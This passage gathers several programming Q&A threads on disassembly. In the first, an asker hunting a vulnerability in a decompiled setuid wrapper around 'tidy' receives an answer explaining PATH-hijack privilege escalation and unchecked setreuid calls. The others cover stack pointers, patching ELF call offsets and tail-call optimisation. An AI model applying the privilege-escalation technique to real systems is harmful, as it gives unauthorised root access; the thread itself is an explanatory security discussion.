00010ae6 68 93 0c PUSH DAT_00010c93 = 74h t
01 00
00010aeb 68 93 0c PUSH DAT_00010c93 = 74h t
01 00
00010af0 e8 17 15 CALL <EXTERNAL>::execlp int execlp(char * __file, char *
00 00
00010af5 83 c4 10 ADD ESP,0x10
00010af8 68 98 0c PUSH s_execlp_00010c98 = "execlp"
01 00
00010afd e8 1a 15 CALL <EXTERNAL>::perror void perror(char * __s)
00 00
00010b02 83 c4 04 ADD ESP,0x4
00010b05 b8 05 00 MOV EAX,0x5
00 00
00010b0a e9 bc 00 JMP LAB_00010bcb
00 00
LAB_00010b0f XREF[1]: 00010b34(j)
00010b0f 8b 45 ec MOV EAX,dword ptr [EBP + pipefd[1]]
00010b12 6a 01 PUSH 0x1
00010b14 8d 55 e7 LEA EDX=>c,[EBP + -0x19]
00010b17 52 PUSH EDX
00010b18 50 PUSH EAX
00010b19 e8 1e 15 CALL <EXTERNAL>::write ssize_t write(int __fd, void * _
00 00
00010b1e 83 c4 0c ADD ESP,0xc
LAB_00010b21 XREF[1]: 00010a8f(j)
00010b21 6a 01 PUSH 0x1
00010b23 8d 45 e7 LEA EAX=>c,[EBP + -0x19]
00010b26 50 PUSH EAX
00010b27 ff 75 f8 PUSH dword ptr [EBP + in]
00010b2a e8 d5 14 CALL <EXTERNAL>::read ssize_t read(int __fd, void * __
00 00
00010b2f 83 c4 0c ADD ESP,0xc
00010b32 85 c0 TEST EAX,EAX
00010b34 75 d9 JNZ LAB_00010b0f
00010b36 8b 45 ec MOV EAX,dword ptr [EBP + pipefd[1]]
00010b39 50 PUSH EAX
00010b3a e8 11 15 CALL <EXTERNAL>::close int close(int __fd)
00 00
00010b3f 83 c4 04 ADD ESP,0x4
00010b42 8b 45 e8 MOV EAX,dword ptr [EBP + pipefd[0]]
00010b45 50 PUSH EAX
00010b46 e8 05 15 CALL <EXTERNAL>::close int close(int __fd)
00 00
00010b4b 83 c4 04 ADD ESP,0x4
00010b4e ff 75 f4 PUSH dword ptr [EBP + fd]
00010b51 e8 fa 14 CALL <EXTERNAL>::close int close(int __fd)
00 00
00010b56 83 c4 04 ADD ESP,0x4
00010b59 ff 75 f8 PUSH dword ptr [EBP + in]
00010b5c e8 ef 14 CALL <EXTERNAL>::close int close(int __fd)
00 00
00010b61 83 c4 04 ADD ESP,0x4
00010b64 6a 00 PUSH 0x0
00010b66 8d 45 e0 LEA EAX=>status,[EBP + -0x20]
00010b69 50 PUSH EAX
00010b6a ff 75 f0 PUSH dword ptr [EBP + pid]
00010b6d e8 b2 14 CALL <EXTERNAL>::waitpid __pid_t waitpid(__pid_t __pid, i
00 00
00010b72 83 c4 0c ADD ESP,0xc
00010b75 8b 45 e0 MOV EAX,dword ptr [EBP + status]
00010b78 c1 f8 08 SAR EAX,0x8
00010b7b 0f b6 c0 MOVZX EAX,AL
00010b7e 83 f8 01 CMP EAX,0x1
00010b81 74 18 JZ LAB_00010b9b
00010b83 83 f8 02 CMP EAX,0x2
00010b86 74 22 JZ LAB_00010baa
00010b88 85 c0 TEST EAX,EAX
00010b8a 75 2d JNZ LAB_00010bb9
00010b8c 68 9f 0c PUSH DAT_00010c9f = 4Fh O
01 00
00010b91 e8 92 14 CALL <EXTERNAL>::puts int puts(char * __s)
00 00
00010b96 83 c4 04 ADD ESP,0x4
00010b99 eb 2b JMP LAB_00010bc6
LAB_00010b9b XREF[1]: 00010b81(j)
00010b9b 68 a4 0c PUSH s_Your_file_is_not_completely_comp_00010ca4 = "Your file is not completely c
01 00
00010ba0 e8 83 14 CALL <EXTERNAL>::puts int puts(char * __s)
00 00
00010ba5 83 c4 04 ADD ESP,0x4
00010ba8 eb 1c JMP LAB_00010bc6
LAB_00010baa XREF[1]: 00010b86(j)
00010baa 68 ca 0c PUSH s_Your_file_contains_errors_00010cca = "Your file contains errors"
01 00
00010baf e8 74 14 CALL <EXTERNAL>::puts int puts(char * __s)
00 00
00010bb4 83 c4 04 ADD ESP,0x4
00010bb7 eb 0d JMP LAB_00010bc6
LAB_00010bb9 XREF[1]: 00010b8a(j)
00010bb9 68 e4 0c PUSH s_I_can't_tell_if_your_file_is_XHT_00010ce4 = "I can't tell if your file is
01 00
00010bbe e8 65 14 CALL <EXTERNAL>::puts int puts(char * __s)
00 00
00010bc3 83 c4 04 ADD ESP,0x4
LAB_00010bc6 XREF[3]: 00010b99(j), 00010ba8(j),
00010bb7(j)
00010bc6 b8 00 00 MOV EAX,0x0
00 00
LAB_00010bcb XREF[6]: 000109d8(j), 00010a0b(j),
00010a3a(j), 00010a61(j),
00010a86(j), 00010b0a(j)
00010bcb 8b 5d fc MOV EBX,dword ptr [EBP + local_8]
00010bce c9 LEAVE
00010bcf c3 RET
According to Ghidra, this decompiles to:
int main(int argc,char **argv)
{
__uid_t __euid;
__uid_t __ruid;
__gid_t __egid;
__gid_t __rgid;
int iVar1;
int __fd;
int iVar2;
__pid_t __pid;
ssize_t sVar3;
uint uVar4;
int status;
char c;
int pipefd [2];
pid_t pid;
int fd;
int in;
__euid = geteuid();
__ruid = geteuid();
setreuid(__ruid,__euid);
__egid = getegid();
__rgid = getegid();
setregid(__rgid,__egid);
if (argv[1] == (char *)0x0) {
fwrite("Please specify the file to verify\n",1,0x22,stderr);
iVar1 = 1;
}
else {
iVar1 = open(argv[1],0);
if (iVar1 < 0) {
perror("open");
iVar1 = 2;
}
else {
__fd = open("/dev/null",2);
if (__fd < 0) {
perror("open");
iVar1 = 5;
}
else {
iVar2 = pipe(pipefd);
if (iVar2 < 0) {
perror("pipe");
iVar1 = 3;
}
else {
__pid = fork();
if (__pid < 0) {
perror("fork");
iVar1 = 4;
}
else if (__pid == 0) {
dup2(pipefd[0],0);
dup2(__fd,1);
dup2(__fd,2);
close(pipefd[1]);
close(__fd);
close(iVar1);
execlp("tidy","tidy","-asxml",0);
perror("execlp");
iVar1 = 5;
}
else {
while( true ) {
sVar3 = read(iVar1,&c,1);
if (sVar3 == 0) break;
write(pipefd[1],&c,1);
}
close(pipefd[1]);
close(pipefd[0]);
close(__fd);
close(iVar1);
waitpid(__pid,&status,0);
uVar4 = status >> 8 & 0xff;
if (uVar4 == 1) {
puts("Your file is not completely compliant");
}
else if (uVar4 == 2) {
puts("Your file contains errors");
}
else if (uVar4 == 0) {
puts("OK!");
}
else {
puts("I can\'t tell if your file is XHTML-compliant");
}
iVar1 = 0;
}
}
}
}
}
return iVar1;
}
It appears it is (to summarize) opening the file passed as the first argument using open in read only mode. If successful, it is forking and using the child process to execute tidy to validate the file is valid XHTML.
Nothing about it stands out to me as an obvious vulnerability that I can use here. I've looked into vulnerabilities for the tidy command, but wasn't really able to find anything useful for this.
Any help would be much appreciated!
In regular C code, execlp("tidy","tidy","-asxml",0); is incorrect as execlp() expects a null pointer argument to mark the end of the argument list.
0 is a null pointer when used in a pointer context, which this is not. Yet on architectures where pointers have the same size and passing convention as int, such as 32-bit linux, passing 0 or passing NULL generate the same code, so sloppiness does not get punished.
In 64-bit mode, it would be incorrect to do so but you might get lucky with the x86_64 ABI and a 64-bit 0 value will be passed in this case.
In your own code, avoid such pitfalls and use NULL or (char *)0 as the last argument for execlp(). But on this listing, Ghidra produces code that generates the same assembly code, and in 32-bit mode, passing 0 or (char *)0 produce the same code, so no problem here.
In your context, execlp("tidy","tidy","-asxml",0); shows another problem: it will look for an executable program with the name tidy in the current PATH and run this program as tidy with a command line argument -asxml. Since it changed the effective uid and gid, this is a problem if the program is setuid root because you can create a program named tidy in a directory appearing in the PATH variable before the system directories and this program will be run with the modified rights.
Another potential problem is the program does not check for failure of the system calls setreuid() and setregid(). Although these calls are unlikely to fail for the arguments passed, as documented in the manual pages, it is a grave security error to omit checking for a failure return from setreuid(). In case of failure, the real and effective uid (or gid) is not changed and the process may fork and exec with root privileges.

Why is a returned stack-pointer replaced by a null-pointer by gcc?

I've created the following function in c as a demonstration/small riddle about how the stack works in c:
#include "stdio.h"
int* func(int i)
{
int j = 3;
j += i;
return &j;
}
int main()
{
int *tmp = func(4);
printf("%d\n", *tmp);
func(5);
printf("%d\n", *tmp);
}
It's obviously undefined behavior and the compiler also produces a warning about that. However unfortunately the compilation didn't quite work out. For some reason gcc replaces the returned pointer by NULL (see line 6d6).
00000000000006aa <func>:
6aa: 55 push %rbp
6ab: 48 89 e5 mov %rsp,%rbp
6ae: 48 83 ec 20 sub $0x20,%rsp
6b2: 89 7d ec mov %edi,-0x14(%rbp)
6b5: 64 48 8b 04 25 28 00 mov %fs:0x28,%rax
6bc: 00 00
6be: 48 89 45 f8 mov %rax,-0x8(%rbp)
6c2: 31 c0 xor %eax,%eax
6c4: c7 45 f4 03 00 00 00 movl $0x3,-0xc(%rbp)
6cb: 8b 55 f4 mov -0xc(%rbp),%edx
6ce: 8b 45 ec mov -0x14(%rbp),%eax
6d1: 01 d0 add %edx,%eax
6d3: 89 45 f4 mov %eax,-0xc(%rbp)
6d6: b8 00 00 00 00 mov $0x0,%eax
6db: 48 8b 4d f8 mov -0x8(%rbp),%rcx
6df: 64 48 33 0c 25 28 00 xor %fs:0x28,%rcx
6e6: 00 00
6e8: 74 05 je 6ef <func+0x45>
6ea: e8 81 fe ff ff callq 570 <__stack_chk_fail#plt>
6ef: c9 leaveq
6f0: c3 retq
This is the disassembly of the binary compiled with gcc version 7.5.0 and the -O0-flag; no other flags were used. This behavior makes the entire code pointless, since it's supposed to show how the stack behaves across function-calls. Is there any way to achieve a more literal compilation of this code with a at least somewhat up-to-date version of gcc?
And just for the sake of curiosity: what's the point of changing the behavior of the code like this in the first place?
Putting the return value in a pointer variable seems to change the behavior of the compiler and it generates the assembly code that returns a pointer to stack:
int* func(int i) {
int j = 3;
j += i;
int *p = &j;
return p;
}

Editing ELF binary call instruction

I am playing around with manipulating a binary's call functions. I have the below code:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
void myfunc2(char *str2, char *str1) {
// enter code here
}
void myfunc(char *str2, char *str1)
{
memcpy(str2 + strlen(str2), str1, strlen(str1));
}
int main(int argc, char **argv)
{
char str1[4] = "tim";
char str2[10] = "hello ";
myfunc((char *)&str2, (char *)&str1);
printf("%s\n", str2);
myfunc2((char *)&str2, (char *)&str1);
printf("%s\n", str2);
return 0;
}
void myfunc2(char *str2, char *str1)
{
memcpy(str2, str1, strlen(str1));
}
I have compiled the binary and using readelf or objdump I can see that my two functions reside at:
46: 000000000040072c 52 FUNC GLOBAL DEFAULT 13 myfunc2**
54: 000000000040064d 77 FUNC GLOBAL DEFAULT 13 myfunc**
Using the command objdump -D test (my binaries name), I can see that main has two callq functions. I tried to edit the first one to point to myfunc2 using the above address 72c, but that does not work; causes the binary to fail.
000000000040069a <main>:
40069a: 55 push %rbp
40069b: 48 89 e5 mov %rsp,%rbp
40069e: 48 83 ec 40 sub $0x40,%rsp
4006a2: 89 7d cc mov %edi,-0x34(%rbp)
4006a5: 48 89 75 c0 mov %rsi,-0x40(%rbp)
4006a9: 64 48 8b 04 25 28 00 mov %fs:0x28,%rax
4006b0: 00 00
4006b2: 48 89 45 f8 mov %rax,-0x8(%rbp)
4006b6: 31 c0 xor %eax,%eax
4006b8: c7 45 d0 74 69 6d 00 movl $0x6d6974,-0x30(%rbp)
4006bf: 48 b8 68 65 6c 6c 6f movabs $0x206f6c6c6568,%rax
4006c6: 20 00 00
4006c9: 48 89 45 e0 mov %rax,-0x20(%rbp)
4006cd: 66 c7 45 e8 00 00 movw $0x0,-0x18(%rbp)
4006d3: 48 8d 55 d0 lea -0x30(%rbp),%rdx
4006d7: 48 8d 45 e0 lea -0x20(%rbp),%rax
4006db: 48 89 d6 mov %rdx,%rsi
4006de: 48 89 c7 mov %rax,%rdi
4006e1: e8 67 ff ff ff callq 40064d <myfunc>
4006e6: 48 8d 45 e0 lea -0x20(%rbp),%rax
4006ea: 48 89 c7 mov %rax,%rdi
4006ed: e8 0e fe ff ff callq 400500 <puts#plt>
4006f2: 48 8d 55 d0 lea -0x30(%rbp),%rdx
4006f6: 48 8d 45 e0 lea -0x20(%rbp),%rax
4006fa: 48 89 d6 mov %rdx,%rsi
4006fd: 48 89 c7 mov %rax,%rdi
400700: e8 27 00 00 00 callq 40072c <myfunc2>
400705: 48 8d 45 e0 lea -0x20(%rbp),%rax
400709: 48 89 c7 mov %rax,%rdi
40070c: e8 ef fd ff ff callq 400500 <puts#plt>
400711: b8 00 00 00 00 mov $0x0,%eax
400716: 48 8b 4d f8 mov -0x8(%rbp),%rcx
40071a: 64 48 33 0c 25 28 00 xor %fs:0x28,%rcx
400721: 00 00
400723: 74 05 je 40072a <main+0x90>
400725: e8 f6 fd ff ff callq 400520 <__stack_chk_fail#plt>
40072a: c9 leaveq
40072b: c3 retq
I suspect I need to do something with calculating the address information through relative location or using the lea/mov instructions.
Any assistance to learn how to modify the call function would be greatly appreciated - please no pointers on editing strings like the howtos all over most of the internet...
In order to rewrite the address, you have to know the exact way the callq instructions are encoded.
Let's take the disassembly output of the first call:
4006e1: e8 67 ff ff ff callq 40064d <myfunc>
4006e6: ...
You can clearly see that the instruction is encoded with 5 bytes. The e8 byte is the instruction opcode, and 67 ff ff ff is the address to jump to. At this point, one would ask the question, what has 67 ff ff ff to do with 0x40064d?
Well, the answer is that e8 encodes a so-called "relative call" and the jump is performed relative to the location of the next instruction. You have to calculate the distance between 4006e6 and the called function in order to rewrite the address. Had the call been absolute (ff), you could just put the function address in these 4 bytes.
To prove that this is the case, consider the following arithmetic:
0x004006e6 + 0xffffff67 == 0x10040064d

Why does this code prevent gcc & llvm from tail-call optimization?

I have tried the following code on gcc 4.4.5 on Linux and gcc-llvm on Mac OSX(Xcode 4.2.1) and this. The below are the source and the generated disassembly of the relevant functions. (Added: compiled with gcc -O2 main.c)
#include <stdio.h>
__attribute__((noinline))
static void g(long num)
{
long m, n;
printf("%p %ld\n", &m, n);
return g(num-1);
}
__attribute__((noinline))
static void h(long num)
{
long m, n;
printf("%ld %ld\n", m, n);
return h(num-1);
}
__attribute__((noinline))
static void f(long * num)
{
scanf("%ld", num);
g(*num);
h(*num);
return f(num);
}
int main(void)
{
printf("int:%lu long:%lu unsigned:%lu\n", sizeof(int), sizeof(long), sizeof(unsigned));
long num;
f(&num);
return 0;
}
08048430 <g>:
8048430: 55 push %ebp
8048431: 89 e5 mov %esp,%ebp
8048433: 53 push %ebx
8048434: 89 c3 mov %eax,%ebx
8048436: 83 ec 24 sub $0x24,%esp
8048439: 8d 45 f4 lea -0xc(%ebp),%eax
804843c: c7 44 24 08 00 00 00 movl $0x0,0x8(%esp)
8048443: 00
8048444: 89 44 24 04 mov %eax,0x4(%esp)
8048448: c7 04 24 d0 85 04 08 movl $0x80485d0,(%esp)
804844f: e8 f0 fe ff ff call 8048344 <printf#plt>
8048454: 8d 43 ff lea -0x1(%ebx),%eax
8048457: e8 d4 ff ff ff call 8048430 <g>
804845c: 83 c4 24 add $0x24,%esp
804845f: 5b pop %ebx
8048460: 5d pop %ebp
8048461: c3 ret
8048462: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi
8048469: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi
08048470 <h>:
8048470: 55 push %ebp
8048471: 89 e5 mov %esp,%ebp
8048473: 83 ec 18 sub $0x18,%esp
8048476: 66 90 xchg %ax,%ax
8048478: c7 44 24 08 00 00 00 movl $0x0,0x8(%esp)
804847f: 00
8048480: c7 44 24 04 00 00 00 movl $0x0,0x4(%esp)
8048487: 00
8048488: c7 04 24 d8 85 04 08 movl $0x80485d8,(%esp)
804848f: e8 b0 fe ff ff call 8048344 <printf#plt>
8048494: eb e2 jmp 8048478 <h+0x8>
8048496: 8d 76 00 lea 0x0(%esi),%esi
8048499: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi
080484a0 <f>:
80484a0: 55 push %ebp
80484a1: 89 e5 mov %esp,%ebp
80484a3: 53 push %ebx
80484a4: 89 c3 mov %eax,%ebx
80484a6: 83 ec 14 sub $0x14,%esp
80484a9: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi
80484b0: 89 5c 24 04 mov %ebx,0x4(%esp)
80484b4: c7 04 24 e1 85 04 08 movl $0x80485e1,(%esp)
80484bb: e8 94 fe ff ff call 8048354 <__isoc99_scanf#plt>
80484c0: 8b 03 mov (%ebx),%eax
80484c2: e8 69 ff ff ff call 8048430 <g>
80484c7: 8b 03 mov (%ebx),%eax
80484c9: e8 a2 ff ff ff call 8048470 <h>
80484ce: eb e0 jmp 80484b0 <f+0x10>
We can see that g() and h() are mostly identical except the & (address of) operator beside the argument m of printf()(and the irrelevant %ld and %p).
However, h() is tail-call optimized and g() is not. Why?
In g(), you're taking the address of a local variable and passing it to a function. A "sufficiently smart compiler" should realize that printf does not store that pointer. Instead, gcc and llvm assume that printf might store the pointer somewhere, so the call frame containing m might need to be "live" further down in the recursion. Therefore, no TCO.
It's the & that does it. It tells the compiler that m should be stored on the stack. Even though it is passed to printf, the compiler has to assume that it might be accessed by somebody else and thus must the cleaned from the stack after the call to g.
In this particular case, as printf is known by the compiler (and it knows that it does not save pointers), it could probably be taught to perform this optimization.
For more info on this, look up 'escape anlysis'.

Resources